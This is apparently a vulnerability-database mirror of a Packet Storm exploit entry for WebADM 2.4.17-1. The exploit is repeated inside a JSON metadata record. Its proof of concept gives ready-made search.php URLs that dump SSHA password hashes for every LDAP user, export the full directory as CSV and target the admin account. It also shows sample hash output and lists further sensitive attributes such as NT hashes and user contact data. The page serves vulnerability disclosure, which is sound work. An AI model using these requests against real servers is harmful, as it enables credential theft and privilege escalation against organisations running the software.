📄 WebADM 2.4.17-1 Password Hash Disclosure_PACKETSTORM:219895

Description

WebADM version 2.4.17-1 contains an authenticated information disclosure vulnerability in the LDAP search functionality. The display parameter in search.php accepts any LDAP attribute without server-side validation. A low-privileged admin can retrieve...

Visit Original Source

Basic Information

ID PACKETSTORM:219895

Published Apr 27, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: WebADM v2.4.17-1 - Authenticated LDAP Password Hash
Disclosure
# Date: 2026-04-27
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.rcdevs.com/
# Software Link: https://www.rcdevs.com/downloads/
# Version: 2.4.17-1 (Freeware Edition)
# Tested on: Linux, WebADM Freeware Edition

# Description:
# WebADM v2.4.17-1 contains an authenticated information disclosure
vulnerability
# in the LDAP search functionality. The `display` parameter in search.php
accepts
# any LDAP attribute without server-side validation. A low-privileged admin
can
# retrieve SSHA password hashes for ALL LDAP users including super admins
via a
# crafted URL, enabling privilege escalation through offline hash cracking.

# Proof of Concept:
#
# 1. Login to WebADM at:
# https://TARGET_IP:10000/admin/
#
# 2. After login, note the session ID in URL:
# https://TARGET_IP:10000/admin/SESSION_ID/index.php
#
# 3. Dump password hashes via direct URL:
#
https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
#
# 4. Full LDAP dump (all attributes):
#
https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(objectClass=*)
#
# 5. Export all data as CSV:
#
https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&export=true&display=*&container=dc=nodomain&filter=(objectClass=*)
#
# 6. Target specific user:
#
https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(cn=admin)
#
# Example vulnerable URL (tested on Debian):
#
https://192.168.1.104:10000/admin/4FWF711NQTL029JW/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)
#
# Result:
# cn=admin,dc=nodomain
# Password: {SSHA}2wjGZ6opxxxxxxxx
# cn=svc_webadm,dc=nodomain
# Password: {SSHA}3qpxxxxxx

# Vulnerable Parameters in URL:
# display=cn,userpassword <- Accepts any LDAP attribute (no server-side
filtering)
# container=dc=nodomain <- LDAP base DN to search
# scope=sub <- Searches entire subtree
# filter=(objectClass=*) <- Matches all LDAP objects
# export=true <- Export all data to CSV file

# Other sensitive attributes accessible via display parameter:
# display=userpassword <- SSHA password hashes
# display=unicodepwd <- Active Directory NT hashes
# display=webadmData <- Encrypted WebADM application data
# display=webadmSettings <- WebADM configuration settings
# display=webadmType <- Object type definitions
# display=userCertificate <- X.509 certificates
# display=mail,mobile <- User PII (email, phone numbers)
# display=member,memberof <- Group membership/privilege mapping
# display=* <- ALL attributes including OpenLDAP internals
# display=*+showall=on <- Return all attributes including internal
ones

{
    "lastseen": "2026-04-27T16:29:14",
    "description": "WebADM version 2.4.17-1 contains an authenticated information disclosure vulnerability in the LDAP search functionality. The display parameter in search.php accepts any LDAP attribute without server-side validation. A low-privileged admin can retrieve...",
    "published": "2026-04-27T00:00:00",
    "modified": "2026-04-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WebADM 2.4.17-1 Password Hash Disclosure",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219895",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: WebADM v2.4.17-1 - Authenticated LDAP Password Hash\n    Disclosure\n    # Date: 2026-04-27\n    # Exploit Author: Chokri Hammedi\n    # Vendor Homepage: https://www.rcdevs.com/\n    # Software Link: https://www.rcdevs.com/downloads/\n    # Version: 2.4.17-1 (Freeware Edition)\n    # Tested on: Linux, WebADM Freeware Edition\n    \n    \n    # Description:\n    # WebADM v2.4.17-1 contains an authenticated information disclosure\n    vulnerability\n    # in the LDAP search functionality. The `display` parameter in search.php\n    accepts\n    # any LDAP attribute without server-side validation. A low-privileged admin\n    can\n    # retrieve SSHA password hashes for ALL LDAP users including super admins\n    via a\n    # crafted URL, enabling privilege escalation through offline hash cracking.\n    \n    \n    # Proof of Concept:\n    #\n    # 1. Login to WebADM at:\n    #    https://TARGET_IP:10000/admin/\n    #\n    # 2. After login, note the session ID in URL:\n    #    https://TARGET_IP:10000/admin/SESSION_ID/index.php\n    #\n    # 3. Dump password hashes via direct URL:\n    #\n    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)\n    #\n    # 4. Full LDAP dump (all attributes):\n    #\n    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(objectClass=*)\n    #\n    # 5. Export all data as CSV:\n    #\n    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&export=true&display=*&container=dc=nodomain&filter=(objectClass=*)\n    #\n    # 6. Target specific user:\n    #\n    https://TARGET_IP:10000/admin/SESSION_ID/search.php?search=true&mode=advanced&scope=sub&display=*&container=dc=nodomain&filter=(cn=admin)\n    #\n    # Example vulnerable URL (tested on Debian):\n    #\n    https://192.168.1.104:10000/admin/4FWF711NQTL029JW/search.php?search=true&mode=advanced&scope=sub&display=cn,userpassword&container=dc=nodomain&filter=(objectClass=*)\n    #\n    # Result:\n    # cn=admin,dc=nodomain\n    # Password: {SSHA}2wjGZ6opxxxxxxxx\n    # cn=svc_webadm,dc=nodomain\n    # Password: {SSHA}3qpxxxxxx\n    \n    # Vulnerable Parameters in URL:\n    # display=cn,userpassword    <- Accepts any LDAP attribute (no server-side\n    filtering)\n    # container=dc=nodomain      <- LDAP base DN to search\n    # scope=sub                  <- Searches entire subtree\n    # filter=(objectClass=*)     <- Matches all LDAP objects\n    # export=true                <- Export all data to CSV file\n    \n    # Other sensitive attributes accessible via display parameter:\n    # display=userpassword       <- SSHA password hashes\n    # display=unicodepwd          <- Active Directory NT hashes\n    # display=webadmData          <- Encrypted WebADM application data\n    # display=webadmSettings      <- WebADM configuration settings\n    # display=webadmType          <- Object type definitions\n    # display=userCertificate     <- X.509 certificates\n    # display=mail,mobile         <- User PII (email, phone numbers)\n    # display=member,memberof     <- Group membership/privilege mapping\n    # display=*                   <- ALL attributes including OpenLDAP internals\n    # display=*+showall=on         <- Return all attributes including internal\n    ones",
    "sourceHref": "https://packetstorm.news/download/219895",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219895/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply